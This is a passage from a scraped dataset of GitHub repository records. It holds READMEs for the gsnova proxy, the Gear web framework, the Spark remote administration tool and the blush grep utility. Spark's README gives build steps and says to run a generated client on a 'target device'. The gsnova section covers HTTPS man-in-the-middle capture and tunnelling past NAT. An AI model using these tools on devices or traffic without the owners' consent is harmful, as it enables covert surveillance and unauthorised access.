/\\__\\/:/\\:\\ \\:\\__\\\r\n\t \\:\\ /\\ \\/__/\\:\\ \\:\\ \\/__/\\/__|:|/:/ /\\:\\ \\ /:/ /|:| |/:/ /\\/__\\:\\/:/ /\r\n\t \\:\\ \\:\\__\\ \\:\\ \\:\\__\\ |:/:/ / \\:\\ /:/ / |:|__/:/ / \\::/ / \r\n\t \\:\\/:/ / \\:\\/:/ / |::/ / \\:\\/:/ / \\::::/__/ /:/ / \r\n\t \\::/ / \\::/ / /:/ / \\::/ / ~~~~ /:/ / \r\n\t \\/__/ \\/__/ \\/__/ \\/__/ \\/__/ \r\n \r\n \r\n```\r\n**Deprecated, use the rust version [rsnova](https://github.com/yinqiwen/rsnova) instead.**\r\n\r\n# Features\r\n- Multiple transport channel support\r\n - http/https\r\n - http2\r\n - websocket\r\n - tcp/tls\r\n - quic\r\n - kcp\r\n - ssh\r\n- Multiplexing \r\n - All proxy connections running over N persist proxy channel connections\r\n- Simple PAC(Proxy Auto Config)\r\n- Multiple Ciphers support\r\n - Chacha20Poly1305\r\n - Salsa20\r\n - AES128\r\n- HTTP/Socks4/Socks5 Proxy\r\n - Local client running as HTTP/Socks4/Socks5 Proxy\r\n- Transparent TCP/UDP Proxy\r\n\t- Transparent tcp/udp proxy implementation in pure golang\r\n- Multi-hop Proxy\r\n- TLS man-in-the-middle(MITM) Proxy\r\n- HTTP(S) Packet Capture for Web Debugging\r\n\t- Log HTTP(S) Packets in file\r\n\t- Forward HTTP(S) Packets to Remote HTTP Server\r\n- P2P/P2S2P Proxy\r\n - P2P: Use TCP NAT tunnel for direct P2P commnunication if possible\r\n - P2S2P: Use middle server for two peers to communication\r\n - Use UPNP to expose port for remote p2p peer if possible.\r\n- Low-memory Environments Support\r\n - Use less than 20MB RSS memory at client/server side\r\n\r\n\r\n# Usage\r\n**go1.9 or higher is requied.**\r\n\r\n## Compile\r\n```shell\r\n go get -t -u -v github.com/yinqiwen/gsnova\r\n```\r\nThere is also prebuilt binary release at [here](https://github.com/yinqiwen/gsnova/releases)\r\n\r\n## Command Line Usage\r\n```\r\nUsage of ./gsnova:\r\n -admin string\r\n \tClient Admin listen address\r\n -blackList value\r\n \tProxy blacklist item config\r\n -client\r\n \tLaunch gsnova as client.\r\n -cmd\r\n \tLaunch gsnova by command line without config file.\r\n -cnip string\r\n \tChina IP list. (default \"./cnipset.txt\")\r\n -conf string\r\n \tConfig file of gsnova.\r\n -forward value\r\n \tForward connection to specified address\r\n -hosts string\r\n \tHosts file of gsnova client. (default \"./hosts.json\")\r\n -httpdump.dst string\r\n \tHTTP Dump destination file or http url\r\n -httpdump.filter value\r\n \tHTTP Dump Domain Filter, eg:*.google.com\r\n -key string\r\n \tCipher key for transmission between local&remote. (default \"809240d3a021449f6e67aa73221d42df942a308a\")\r\n -listen value\r\n \tListen on address.\r\n -log string\r\n \tLog file setting (default \"color,gsnova.log\")\r\n -mitm\r\n \tLaunch gsnova as a MITM Proxy\r\n -ots string\r\n \tOnline trouble shooting listen address\r\n -p2p string\r\n \tP2P Token.\r\n -pid string\r\n \tPID file (default \".gsnova.pid\")\r\n -ping_interval int\r\n \tChannel ping interval seconds. (default 30)\r\n -pprof string\r\n \tPProf trouble shooting listen address\r\n -proxy string\r\n \tProxy setting to connect remote server.\r\n -remote value\r\n \tNext remote proxy hop server to connect for client, eg:wss://xxx.paas.com\r\n -servable\r\n \tClient as a proxy server for peer p2p client\r\n -server\r\n \tLaunch gsnova as server.\r\n -stream_idle int\r\n \tMux stream idle timout seconds. (default 10)\r\n -tls.cert string\r\n \tTLS Cert file\r\n -tls.key string\r\n \tTLS Key file\r\n -upnp int\r\n \tUPNP port to expose for p2p.\r\n -user string\r\n \tUsername for remote server to authorize. (default \"gsnova\")\r\n -version\r\n \tPrint version.\r\n -whitelist value\r\n \tProxy whitelist item config\r\n -window string\r\n \tMax mux stream window size, default 512K\r\n -window_refresh string\r\n \tMux stream window refresh size, default 32K\r\n```\r\n\r\n## Deploy & Run Server\r\n\r\n```shell\r\n ./gsnova -cmd -server -listen tcp://:48100 -listen quic://:48100 -listen tls://:48101 -listen kcp://:48101 -listen http://:48102 -listen http2://:48103 -key 809240d3a021449f6e67aa73221d42df942a308a -user \"*\"\r\n```\r\nThis would launch a running instance listening at serveral ports with different transport protocol. \r\n\r\nThe server can also be deployed to serveral PAAS service like heroku/openshift and some docker host service. \r\n\r\n## Deploy & Run Client\r\n\r\n### Run From Command Line\r\n```\r\n ./gsnova -cmd -client -listen :48100 -remote http2://app1.openshiftapps.com -key 809240d3a021449f6e67aa73221d42df942a308a\r\n```\r\nThis would launch a socks4/socks5/http proxy at port 48100 and use http2://app1.openshiftapps.com as next proxy hop.\r\n\r\n### Run With Confguration\r\n\r\nThis is a sample for [client.json](https://github.com/yinqiwen/gsnova/blob/master/client.json), the `Key` and the `ServerList` need to be modified to match your server.\r\n```\r\n ./gsnova -client -conf ./client.json\r\n```\r\n\r\n### Advanced Usage\r\n#### Multi-Hop Proxy\r\nGSnova support more than ONE remote server as the next hops, just add more `-remote server` arguments to enable multi-hop proxy. \r\nThis would use `http2://app1.openshiftapps.com` as the first proxy ho and use `wss://app2.herokuapp.com` as the final proxy hop.\r\n```shell\r\n ./gsnova -cmd -client -listen :48101 -remote http2://app1.openshiftapps.com -remote wss://app2.herokuapp.com -key 809240d3a021449f6e67aa73221d42df942a308a\r\n```\r\n#### Transparent Proxy\r\n- Edit iptables rules.\r\n- It's only works on linux.\r\n\r\n#### MITM Proxy\r\nGSnova support running the client as a MITM proxy to capture HTTP(S) packets for web debuging. \r\nThis would capture HTTP(S) traffic packets into local dist file `httpdump.log`.\r\n```shell\r\n ./gsnova -cmd -client -listen :48101 -remote direct -mitm -httpdump.dst ./httpdump.log -httpdump.filter \"*.google.com\" -httpdump.filter \"*.facebook.com\"\r\n```\r\n\r\n#### P2P/P2S2P Proxy\r\nP2P/P2S2P Proxy can help you to connect two nodes, and use one of them as a tcp proxy server for the other one. This feature can be used for scenarios like: \r\n- Expose any tcp based service behind a NAT or firewall to a specific node in the internet.\r\n\r\nThere are 3 nodes which should install/run gsnova, a middle server(S) with public IP address, two client nodes(A & B) behind a NAT or firewall. \r\nFor the middle server(S), run as a server with a cipher key.\r\n```shell\r\n ./gsnova -cmd -server -listen tcp://:48103 -key p2pkey -log color\r\n```\r\nFor the node(B) as a proxy server, run as a client to connect server with a P2P token:\r\n```shell\r\n ./gsnova -cmd -client -servable -key p2pkey -remote tcp://:48103 -p2p testp2p -log color \r\n```\r\nFor the node(A) as a client for peer proxy server, run as a client to connect server with same P2P token:\r\n```shell\r\n ./gsnova -cmd -client -listen :7788 -key p2pkey -remote tcp://:48103 -p2p testp2p -log color \r\n```\r\nIf there is no error, now the node A with listen address :7788 can be used as a http/socks4/socks5 proxy to access servers behind a NAT or firewall which node B located in. \r\n\r\nAnd in gsnova, it would try to run with P2P mode first, if it's not pissible, it would use P2S2P mode which would use the middle server to forward tcp stream to remote peeer. \r\n\r\n## Mobile Client(Android)\r\nThe client side can be compiled to android library by `gomobile`, eg:\r\n```\r\n gomobile bind -target=android -a -v github.com/yinqiwen/gsnova/local/gsnova\r\n```\r\nUsers can develop there own app by using the generated `gsnova.aar`. \r\nThere is a very simple andorid app [gsnova-android-v0.27.3.1.zip](https://github.com/yinqiwen/gsnova/releases/download/v0.27.3/gsnova-android-v0.27.3.1.zip) which use `tun2socks` + `gsnova` to build. \r\n\r\n\r\n\r\n\r\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "teambition/gear", "link": "https://github.com/teambition/gear", "tags": ["gear", "middleware", "hooks", "router", "logging", "http2", "server-push", "go", "web", "framework"], "stars": 546, "description": "A lightweight, composable and high performance web service framework for Go.", "lang": "Go", "repo_lang": "", "readme": "![Gear](https://raw.githubusercontent.com/teambition/gear/master/gear.png)\n\n[![CI](https://github.com/teambition/gear/actions/workflows/ci-cover.yml/badge.svg)](https://github.com/teambition/gear/actions/workflows/ci-cover.yml)\n[![Codecov](https://codecov.io/gh/teambition/gear/branch/master/graph/badge.svg)](https://codecov.io/gh/teambition/gear)\n[![CodeQL](https://github.com/teambition/gear/actions/workflows/codeql.yml/badge.svg)](https://github.com/teambition/gear/actions/workflows/codeql.yml)\n[![Go Reference](https://pkg.go.dev/badge/github.com/teambition/gear.svg)](https://pkg.go.dev/github.com/teambition/gear)\n[![License](http://img.shields.io/badge/license-mit-blue.svg?style=flat-square)](https://raw.githubusercontent.com/teambition/gear/master/LICENSE)\n\nA lightweight, composable and high performance web service framework for Go.\n\n## Features\n\n- Effective and flexible middlewares flow control, create anything by middleware\n- Powerful and smart HTTP error handling\n- Trie base gear.Router, as faster as [HttpRouter](https://github.com/julienschmidt/httprouter), support regexp parameters and group routes\n- Integrated timeout context.Context\n- Integrated response content compress\n- Integrated structured logging middleware\n- Integrated request body parser\n- Integrated signed cookies\n- Integrated JSON, JSONP, XML and HTML renderer\n- Integrated CORS, Secure, Favicon and Static middlewares\n- More useful methods on gear.Context to manipulate HTTP Request/Response\n- Run HTTP and gRPC on the same port\n- Completely HTTP/2.0 supported\n\n## Documentation\n\n[Go-Documentation](https://godoc.org/github.com/teambition/gear)\n\n## Import\n\n```go\n// package gear\nimport \"github.com/teambition/gear\"\n```\n\n## Design\n\n1. [Server \u5e95\u5c42\u57fa\u4e8e\u539f\u751f net/http \u800c\u4e0d\u662f fasthttp](https://github.com/teambition/gear/blob/master/doc/design.md#1-server-\u5e95\u5c42\u57fa\u4e8e\u539f\u751f-nethttp-\u800c\u4e0d\u662f-fasthttp)\n1. [\u901a\u8fc7 gear.Middleware \u4e2d\u95f4\u4ef6\u6a21\u5f0f\u6269\u5c55\u529f\u80fd\u6a21\u5757](https://github.com/teambition/gear/blob/master/doc/design.md#2-\u901a\u8fc7-gearmiddleware-\u4e2d\u95f4\u4ef6\u6a21\u5f0f\u6269\u5c55\u529f\u80fd\u6a21\u5757)\n1. [\u4e2d\u95f4\u4ef6\u7684\u5355\u5411\u987a\u5e8f\u6d41\u7a0b\u63a7\u5236\u548c\u7ea7\u8054\u6d41\u7a0b\u63a7\u5236](https://github.com/teambition/gear/blob/master/doc/design.md#3-\u4e2d\u95f4\u4ef6\u7684\u5355\u5411\u987a\u5e8f\u6d41\u7a0b\u63a7\u5236\u548c\u7ea7\u8054\u6d41\u7a0b\u63a7\u5236)\n1. [\u529f\u80fd\u5f3a\u5927\uff0c\u5b8c\u7f8e\u96c6\u6210 context.Context \u7684 gear.Context](https://github.com/teambition/gear/blob/master/doc/design.md#4-\u529f\u80fd\u5f3a\u5927\u5b8c\u7f8e\u96c6\u6210-contextcontext-\u7684-gearcontext)\n1. [\u96c6\u4e2d\u3001\u667a\u80fd\u3001\u53ef\u81ea\u5b9a\u4e49\u7684\u9519\u8bef\u548c\u5f02\u5e38\u5904\u7406](https://github.com/teambition/gear/blob/master/doc/design.md#5-\u96c6\u4e2d\u667a\u80fd\u53ef\u81ea\u5b9a\u4e49\u7684\u9519\u8bef\u548c\u5f02\u5e38\u5904\u7406)\n1. [After Hook \u548c End Hook \u7684\u540e\u7f6e\u5904\u7406](https://github.com/teambition/gear/blob/master/doc/design.md#6-after-hook-\u548c-end-hook-\u7684\u540e\u7f6e\u5904\u7406)\n1. [Any interface \u65e0\u9650\u7684 gear.Context \u72b6\u6001\u6269\u5c55\u80fd\u529b](https://github.com/teambition/gear/blob/master/doc/design.md#7-any-interface-\u65e0\u9650\u7684-gearcontext-\u72b6\u6001\u6269\u5c55\u80fd\u529b)\n1. [\u8bf7\u6c42\u6570\u636e\u7684\u89e3\u6790\u548c\u9a8c\u8bc1](https://github.com/teambition/gear/blob/master/doc/design.md#8-\u8bf7\u6c42\u6570\u636e\u7684\u89e3\u6790\u548c\u9a8c\u8bc1)\n\n## FAQ\n\n1. [\u5982\u4f55\u4ece\u6e90\u7801\u81ea\u52a8\u751f\u6210 Swagger v2 \u7684\u6587\u6863\uff1f](https://github.com/teambition/gear/blob/master/doc/faq.md#1-\u5982\u4f55\u4ece\u6e90\u7801\u81ea\u52a8\u751f\u6210-swagger-v2-\u7684\u6587\u6863)\n1. [Go \u8bed\u8a00\u5b8c\u6574\u7684\u5e94\u7528\u9879\u76ee\u7ed3\u6784\u6700\u4f73\u5b9e\u8df5\u662f\u600e\u6837\u7684\uff1f](https://github.com/teambition/gear/blob/master/doc/faq.md#2-go-\u8bed\u8a00\u5b8c\u6574\u7684\u5e94\u7528\u9879\u76ee\u7ed3\u6784\u6700\u4f73\u5b9e\u8df5\u662f\u600e\u6837\u7684)\n\n## Demo\n\n### Hello\n\nhttps://github.com/teambition/gear/tree/master/example/hello\n\n```go\n app := gear.New()\n\n // Add logging middleware\n app.UseHandler(logging.Default(true))\n\n // Add router middleware\n router := gear.NewRouter()\n\n // try: http://127.0.0.1:3000/hello\n router.Get(\"/hello\", func(ctx *gear.Context) error {\n return ctx.HTML(200, \"

Hello, Gear!

\")\n })\n\n // try: http://127.0.0.1:3000/test?query=hello\n router.Otherwise(func(ctx *gear.Context) error {\n return ctx.JSON(200, map[string]any{\n \"Host\": ctx.Host,\n \"Method\": ctx.Method,\n \"Path\": ctx.Path,\n \"URI\": ctx.Req.RequestURI,\n \"Headers\": ctx.Req.Header,\n })\n })\n app.UseHandler(router)\n app.Error(app.Listen(\":3000\"))\n```\n\n### HTTP2 with Push\n\nhttps://github.com/teambition/gear/tree/master/example/http2\n\n```go\npackage main\n\nimport (\n \"net/http\"\n\n \"github.com/teambition/gear\"\n \"github.com/teambition/gear/logging\"\n \"github.com/teambition/gear/middleware/favicon\"\n)\n\n// go run example/http2/app.go\n// Visit: https://127.0.0.1:3000/\nfunc main() {\n const htmlBody = `\n\n\n \n \n \n \n

Hello, Gear!

\n \n`\n\n const pushBody = `\nh1 {\n color: red;\n}\n`\n\n app := gear.New()\n\n app.UseHandler(logging.Default(true))\n app.Use(favicon.New(\"./testdata/favicon.ico\"))\n\n router := gear.NewRouter()\n router.Get(\"/\", func(ctx *gear.Context) error {\n ctx.Res.Push(\"/hello.css\", &http.PushOptions{Method: \"GET\"})\n return ctx.HTML(200, htmlBody)\n })\n router.Get(\"/hello.css\", func(ctx *gear.Context) error {\n ctx.Type(\"text/css\")\n return ctx.End(200, []byte(pushBody))\n })\n app.UseHandler(router)\n app.Error(app.ListenTLS(\":3000\", \"./testdata/out/test.crt\", \"./testdata/out/test.key\"))\n}\n```\n\n### A CMD tool: static server\n\nhttps://github.com/teambition/gear/tree/master/example/staticgo\n\nInstall it with go:\n\n```sh\ngo install github.com/teambition/gear/example/staticgo\n```\n\nIt is a useful CMD tool that serve your local files as web server (support TLS).\nYou can build `osx`, `linux`, `windows` version with `make build`.\n\n```go\npackage main\n\nimport (\n \"flag\"\n\n \"github.com/teambition/gear\"\n \"github.com/teambition/gear/logging\"\n \"github.com/teambition/gear/middleware/cors\"\n \"github.com/teambition/gear/middleware/static\"\n)\n\nvar (\n address = flag.String(\"addr\", \"127.0.0.1:3000\", `address to listen on.`)\n path = flag.String(\"path\", \"./\", `static files path to serve.`)\n certFile = flag.String(\"certFile\", \"\", `certFile path, used to create TLS static server.`)\n keyFile = flag.String(\"keyFile\", \"\", `keyFile path, used to create TLS static server.`)\n)\n\nfunc main() {\n flag.Parse()\n app := gear.New()\n\n app.UseHandler(logging.Default(true))\n app.Use(cors.New())\n app.Use(static.New(static.Options{Root: *path}))\n\n logging.Println(\"staticgo v1.1.0, created by https://github.com/teambition/gear\")\n logging.Printf(\"listen: %s, serve: %s\\n\", *address, *path)\n\n if *certFile != \"\" && *keyFile != \"\" {\n app.Error(app.ListenTLS(*address, *certFile, *keyFile))\n } else {\n app.Error(app.Listen(*address))\n }\n}\n```\n\n### HTTP2 & gRPC\n\nhttps://github.com/teambition/gear/tree/master/example/grpc_server\n\nhttps://github.com/teambition/gear/tree/master/example/grpc_client\n\n## About Router\n\n[gear.Router](https://godoc.org/github.com/teambition/gear#Router) is a trie base HTTP request handler.\nFeatures:\n\n1. Support named parameter\n1. Support regexp\n1. Support suffix matching\n1. Support multi-router\n1. Support router layer middlewares\n1. Support fixed path automatic redirection\n1. Support trailing slash automatic redirection\n1. Automatic handle `405 Method Not Allowed`\n1. Automatic handle `OPTIONS` method\n1. Best Performance\n\nThe registered path, against which the router matches incoming requests, can contain six types of parameters:\n\n| Syntax | Description |\n|--------|------|\n| `:name` | named parameter |\n| `:name(regexp)` | named with regexp parameter |\n| `:name+suffix` | named parameter with suffix matching |\n| `:name(regexp)+suffix` | named with regexp parameter and suffix matching |\n| `:name*` | named with catch-all parameter |\n| `::name` | not named parameter, it is literal `:name` |\n\nNamed parameters are dynamic path segments. They match anything until the next '/' or the path end:\n\nDefined: `/api/:type/:ID`\n\n```md\n/api/user/123 matched: type=\"user\", ID=\"123\"\n/api/user no match\n/api/user/123/comments no match\n```\n\nNamed with regexp parameters match anything using regexp until the next '/' or the path end:\n\nDefined: `/api/:type/:ID(^\\d+$)`\n\n```md\n/api/user/123 matched: type=\"user\", ID=\"123\"\n/api/user no match\n/api/user/abc no match\n/api/user/123/comments no match\n```\n\nNamed parameters with suffix, such as [Google API Design](https://cloud.google.com/apis/design/custom_methods):\n\nDefined: `/api/:resource/:ID+:undelete`\n\n```md\n/api/file/123 no match\n/api/file/123:undelete matched: resource=\"file\", ID=\"123\"\n/api/file/123:undelete/comments no match\n```\n\nNamed with regexp parameters and suffix:\n\nDefined: `/api/:resource/:ID(^\\d+$)+:cancel`\n\n```md\n/api/task/123 no match\n/api/task/123:cancel matched: resource=\"task\", ID=\"123\"\n/api/task/abc:cancel no match\n```\n\nNamed with catch-all parameters match anything until the path end, including the directory index (the '/' before the catch-all). Since they match anything until the end, catch-all parameters must always be the final path element.\n\nDefined: `/files/:filepath*`\n\n```\n/files no match\n/files/LICENSE matched: filepath=\"LICENSE\"\n/files/templates/article.html matched: filepath=\"templates/article.html\"\n```\n\nThe value of parameters is saved on the `Matched.Params`. Retrieve the value of a parameter by name:\n\n```go\ntype := matched.Params(\"type\")\nid := matched.Params(\"ID\")\n```\n\n## More Middlewares\n\n- Structured logging: [github.com/teambition/gear/logging](https://github.com/teambition/gear/tree/master/logging)\n- CORS handler: [github.com/teambition/gear/middleware/cors](https://github.com/teambition/gear/tree/master/middleware/cors)\n- Secure handler: [github.com/teambition/gear/middleware/secure](https://github.com/teambition/gear/tree/master/middleware/secure)\n- Static serving: [github.com/teambition/gear/middleware/static](https://github.com/teambition/gear/tree/master/middleware/static)\n- Favicon serving: [github.com/teambition/gear/middleware/favicon](https://github.com/teambition/gear/tree/master/middleware/favicon)\n- gRPC serving: [github.com/teambition/gear/middleware/grpc](https://github.com/teambition/gear/tree/master/middleware/grpc)\n- JWT and Crypto auth: [Gear-Auth](https://github.com/teambition/gear-auth)\n- Cookie session: [Gear-Session](https://github.com/teambition/gear-session)\n- Session middleware: [https://github.com/go-session/gear-session](https://github.com/go-session/gear-session)\n- Smart rate limiter: [Gear-Ratelimiter](https://github.com/teambition/gear-ratelimiter)\n- CSRF: [Gear-CSRF](https://github.com/teambition/gear-csrf)\n- Opentracing with Zipkin: [Gear-Tracing](https://github.com/teambition/gear-tracing)\n\n## License\n\nGear is licensed under the [MIT](https://github.com/teambition/gear/blob/master/LICENSE) license.\nCopyright © 2016-2023 [Teambition](https://www.teambition.com).\n", "readme_type": "markdown", "hn_comments": "Features- Effective and flexible middlewares flow control, create anything by middleware- Powerful and smart error handler, make development easy- Trie base gear.Router, it is as faster as [HttpRouter](https://github.com/julienschmidt/httprouter), but more powerful- Integrated timeout context.Context- Integrated response content compress- Integrated structured logging middleware- Integrated request body parser- Integrated signed cookies- Integrated JSON, JSONP, XML and HTML renderer- Integrated CORS, Secure, Favicon and Static middlewares- More useful methods on gear.Context to manipulate HTTP Request/Response- Completely HTTP/2.0 supported", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "XZB-1248/Spark", "link": "https://github.com/XZB-1248/Spark", "tags": ["golang", "rat", "remote-control", "remote-administration-tool", "remote-admin-tool", "spark", "server-monitoring", "dashboard", "go", "remote-access-tool", "shell", "webshell"], "stars": 547, "description": "\u2728Spark is a web-based, cross-platform and full-featured Remote Administration Tool (RAT) written in Go that allows you control all your devices anywhere. Spark\u662f\u4e00\u4e2aGo\u7f16\u5199\u7684\uff0c\u7f51\u9875UI\u3001\u8de8\u5e73\u53f0\u4ee5\u53ca\u591a\u529f\u80fd\u7684\u8fdc\u7a0b\u63a7\u5236\u548c\u76d1\u63a7\u5de5\u5177\uff0c\u4f60\u53ef\u4ee5\u968f\u65f6\u968f\u5730\u76d1\u63a7\u548c\u63a7\u5236\u6240\u6709\u8bbe\u5907\u3002", "lang": "Go", "repo_lang": "", "readme": "#### [English] [[\u4e2d\u6587]](./README.ZH.md) [[API Document]](./API.md) [[API\u6587\u6863]](./API.ZH.md)\n\n---\n\n

Spark

\n\n**Spark** is a free, safe, open-source, web-based, cross-platform and full-featured RAT (Remote Administration Tool)\nthat allow you to control all your devices via browser anywhere.\n\nWe **won't** collect any data, thus the server will never self-upgrade. Your clients will only communicate with your\nserver forever.\n\n---\n\n
\n\n|![GitHub repo size](https://img.shields.io/github/repo-size/DGP-Studio/Snap.Genshin?style=flat-square)|![GitHub issues](https://img.shields.io/github/issues/XZB-1248/Spark?style=flat-square)|![GitHub closed issues](https://img.shields.io/github/issues-closed/XZB-1248/Spark?style=flat-square)|\n|-|-|-|\n\n|[![GitHub downloads](https://img.shields.io/github/downloads/XZB-1248/Spark/total?style=flat-square)](https://github.com/XZB-1248/Spark/releases)|[![GitHub release (latest by date)](https://img.shields.io/github/downloads/XZB-1248/Spark/latest/total?style=flat-square)](https://github.com/XZB-1248/Spark/releases/latest)|\n|-|-|\n\n
\n\n---\n\n## Disclaimer\n\n**THIS PROJECT, ITS SOURCE CODE, AND ITS RELEASES SHOULD ONLY BE USED FOR EDUCATIONAL PURPOSES.**\n
\n**ALL ILLEGAL USAGE IS PROHIBITED!**\n
\n**YOU SHALL USE THIS PROJECT AT YOUR OWN RISK.**\n
\n**THE AUTHORS AND DEVELOPERS ARE NOT RESPONSIBLE FOR ANY DAMAGE CAUSED BY YOUR MISUSE OF THIS PROJECT.**\n\n**YOUR DATA IS PRICELESS. THINK TWICE BEFORE YOU CLICK ANY BUTTON OR ENTER ANY COMMAND.**\n\n---\n\n## Quick start\n\n### binary\n\n* Download executable from [releases](https://github.com/XZB-1248/Spark/releases).\n* Following [this](#Configuration) to complete configuration.\n* Run executable and browse to `http://IP:Port` to access the web interface.\n* Generate a client and run it on your target device.\n* Enjoy!\n\n---\n\n## Configuration\n\nConfiguration file `config.json` should be placed in the same directory as the executable file.\n
\nExample:\n\n ```json\n {\n \"listen\": \":8000\",\n \"salt\": \"123456abcdefg\",\n \"auth\": {\n \"username\": \"password\"\n },\n \"log\": {\n \"level\": \"info\",\n \"path\": \"./logs\",\n \"days\": 7\n }\n }\n ```\n\n* `listen` `required`, format: `IP:Port`\n* `salt` `required`, length <= 24\n * after modification, you need to re-generate all clients\n* `auth` `optional`, format: `username:password`\n * hashed-password is highly recommended\n * format: `$algorithm$hashed-password`, example: `$sha256$123456abcdefg`\n * supported algorithms: `sha256`, `sha512`, `bcrypt`\n * if you don't follow the format, password will be treated as plain-text\n* `log` `optional`\n * `level` `optional`, possible value: `disable`, `fatal`, `error`, `warn`, `info`, `debug`\n * `path` `optional`, default: `./logs`\n * `days` `optional`, default: `7`\n\n---\n\n## Features\n\n| Feature/OS | Windows | Linux | MacOS |\n|-----------------|---------|-------|-------|\n| Process manager | \u2714 | \u2714 | \u2714 |\n| Kill process | \u2714 | \u2714 | \u2714 |\n| Network traffic | \u2714 | \u2714 | \u2714 |\n| File explorer | \u2714 | \u2714 | \u2714 |\n| File transfer | \u2714 | \u2714 | \u2714 |\n| File editor | \u2714 | \u2714 | \u2714 |\n| Delete file | \u2714 | \u2714 | \u2714 |\n| Code highlight | \u2714 | \u2714 | \u2714 |\n| Desktop monitor | \u2714 | \u2714 | \u2714 |\n| Screenshot | \u2714 | \u2714 | \u2714 |\n| OS info | \u2714 | \u2714 | \u2714 |\n| Terminal | \u2714 | \u2714 | \u2714 |\n| * Shutdown | \u2714 | \u2714 | \u2714 |\n| * Reboot | \u2714 | \u2714 | \u2714 |\n| * Log off | \u2714 | \u274c | \u2714 |\n| * Sleep | \u2714 | \u274c | \u2714 |\n| * Hibernate | \u2714 | \u274c | \u274c |\n| * Lock screen | \u2714 | \u274c | \u274c |\n\n* Blank cell means the situation is not tested yet.\n* The Star symbol means the function may need administration or root privilege.\n\n---\n\n## Screenshots\n\n![overview](./screenshots/overview.png)\n\n![terminal](./screenshots/terminal.png)\n\n![desktop](./screenshots/desktop.png)\n\n![procmgr](./screenshots/procmgr.png)\n\n![explorer](./screenshots/explorer.png)\n\n![overview.cpu](./screenshots/overview.cpu.png)\n\n![explorer.editor](./screenshots/explorer.editor.png)\n\n---\n\n## Development\n\n### note\n\nThere are three components in this project, so you have to build them all.\n\nGo to [Quick start](#quick-start) if you don't want to make yourself boring.\n\n* Client\n* Server\n* Front-end\n\nIf you want to make client support OS except linux and windows, you should install some additional C compiler.\n\nFor example, to support android, you have to install [Android NDK](https://developer.android.com/ndk/downloads).\n\n### tutorial\n\n```bash\n# Clone this repository.\n$ git clone https://github.com/XZB-1248/Spark\n$ cd ./Spark\n\n\n# Here we're going to build front-end pages.\n$ cd ./web\n# Install all dependencies and build.\n$ npm install\n$ npm run build-prod\n\n\n# Embed all static resources into one single file by using statik.\n$ cd ..\n$ go install github.com/rakyll/statik\n$ statik -m -src=\"./web/dist\" -f -dest=\"./server/embed\" -p web -ns web\n\n\n# Now we should build client.\n# When you're using unix-like OS, you can use this.\n$ mkdir ./built\n$ go mod tidy\n$ go mod download\n$ ./scripts/build.client.sh\n\n\n# Finally we're compiling the server side.\n$ mkdir ./releases\n$ ./scripts/build.server.sh\n```\n\nThen create a new directory with a name you like.\n
\nCopy executable file inside `releases` to that directory.\n
\nCopy the whole `built` directory to that new directory.\n
\nCopy configuration file mentioned above to that new directory.\n
\nFinally, run the executable file in that directory.\n\n---\n\n## Dependencies\n\nSpark contains many third-party open-source projects.\n\nLists of dependencies can be found at `go.mod` and `package.json`.\n\nSome major dependencies are listed below.\n\n### Back-end\n\n* [Go](https://github.com/golang/go) ([License](https://github.com/golang/go/blob/master/LICENSE))\n\n* [gin-gonic/gin](https://github.com/gin-gonic/gin) (MIT License)\n\n* [imroc/req](https://github.com/imroc/req) (MIT License)\n\n* [kbinani/screenshot](https://github.com/kbinani/screenshot) (MIT License)\n\n* [shirou/gopsutil](https://github.com/shirou/gopsutil) ([License](https://github.com/shirou/gopsutil/blob/master/LICENSE))\n\n* [gorilla/websocket](https://github.com/gorilla/websocket) (BSD-2-Clause License)\n\n* [orcaman/concurrent-map](https://github.com/orcaman/concurrent-map) (MIT License)\n\n### Front-end\n\n* [React](https://github.com/facebook/react) (MIT License)\n\n* [Ant-Design](https://github.com/ant-design/ant-design) (MIT License)\n\n* [axios](https://github.com/axios/axios) (MIT License)\n\n* [xterm.js](https://github.com/xtermjs/xterm.js) (MIT License)\n\n* [crypto-js](https://github.com/brix/crypto-js) (MIT License)\n\n### Acknowledgements\n\n* [natpass](https://github.com/lwch/natpass) (MIT License)\n* Image difference algorithm inspired by natpass.\n\n---\n\n### Stargazers over time\n\n[![Stargazers over time](https://starchart.cc/XZB-1248/Spark.svg)](https://starchart.cc/XZB-1248/Spark)\n\n---\n\n## License\n\n[BSD-2 License](./LICENSE)", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "arsham/blush", "link": "https://github.com/arsham/blush", "tags": ["grep", "terminal-app", "golang", "go"], "stars": 546, "description": "Grep with colours", "lang": "Go", "repo_lang": "", "readme": "# Blush\n\n[![PkgGoDev](https://pkg.go.dev/badge/github.com/arsham/dbtools)](https://pkg.go.dev/github.com/arsham/dbtools)\n![GitHub go.mod Go version](https://img.shields.io/github/go-mod/go-version/arsham/dbtools)\n[![Build Status](https://github.com/arsham/dbtools/actions/workflows/go.yml/badge.svg)](https://github.com/arsham/dbtools/actions/workflows/go.yml)\n[![License: MIT](https://img.shields.io/badge/License-MIT-blue.svg)](https://opensource.org/licenses/MIT)\n[![Coverage Status](https://codecov.io/gh/arsham/blush/branch/master/graph/badge.svg)](https://codecov.io/gh/arsham/blush)\n[![Go Report Card](https://goreportcard.com/badge/github.com/arsham/blush)](https://goreportcard.com/report/github.com/arsham/blush)\n\nWith Blush, you can highlight matches with any colours of your choice.\n\n![1](https://user-images.githubusercontent.com/428611/164768864-e9713ac3-0097-4435-8bcb-577dbf7b9931.png)\n\n1. [Install](#install)\n2. [Usage](#usage)\n - [Note](#note)\n - [Normal Mode](#normal-mode)\n - [Dropping Unmatched](#dropping-unmatched)\n - [Piping](#piping)\n3. [Arguments](#arguments)\n - [Notes](#notes)\n4. [Colour Groups](#colour-groups)\n5. [Colours](#colours)\n6. [Complex Grep](#complex-grep)\n7. [Suggestions](#suggestions)\n8. [License](#license)\n\n## Install\n\nYou can grab a binary from [releases](https://github.com/arsham/blush/releases)\npage. If you prefer to install it manually you can get the code and install it\nwith the following command:\n\n```bash\n$ go install github.com/arsham/blush@latest\n```\n\nMake sure you have `go>=1.18` installed.\n\n## Usage\n\nBlush can read from a file or a pipe:\n\n```bash\n$ cat FILENAME | blush -b \"print in blue\" -g \"in green\" -g \"another green\"\n$ cat FILENAME | blush \"some text\"\n$ blush -b \"print in blue\" -g \"in green\" -g \"another green\" FILENAME\n$ blush \"some text\" 